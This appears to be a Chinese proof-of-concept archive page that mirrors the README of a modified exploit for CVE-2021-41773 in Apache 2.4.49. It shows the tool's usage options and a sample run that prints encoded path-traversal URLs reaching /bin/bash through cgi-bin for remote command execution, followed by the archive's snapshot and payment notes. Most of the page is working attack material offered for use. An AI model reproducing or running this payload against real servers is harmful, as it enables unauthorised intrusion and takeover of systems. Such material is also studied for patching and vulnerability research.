关联漏洞
描述
CVE-2021-41773 Gaurav Raj's exploit modified by Plunder
介绍
# CVE-2021-41773 ( Apache / 2.4.49 )
CVE-2021-41773 exploit by Gaurav Jav modified by Plunder in order to use custom exploit
Usage :
```
$ py exploit.py -h
usage: exploit.py [-h] -t TARGET [-b BINARY]
Apache2 2.4.49 Exploit
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Specify the target IP or Domain. eg: 127.0.0.1 or example.com
-b BINARY, --binary BINARY
Specify the binary file to execute. eg: /bin/sh (/bin/sh by default)
```
exemple :
```
PS C:\Users\Mateo\Downloads\Apache 2.4.49 -- exploit kit> py exploit.py -t <ip> -b /bin/bash
--------------------------------------------------------------------------------------------
| Apache2 2.4.49 - Exploit |
| Author : Gaurav Raj |
| Modified by : Plunder |
--------------------------------------------------------------------------------------------
url : <ip>
binary used : /bin/bash
http path traversal url : http://<ip>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash
https path traveral url (relative): https://<ip>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash
>>>
```
Gurav Jave project : https://github.com/thehackersbrain/CVE-2021-41773
文件快照
[4.0K] /data/pocs/53c32b3403eee9a7a37cc86c74ddadb8e6b0eab7
├── [2.7K] exploit.py
└── [1.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。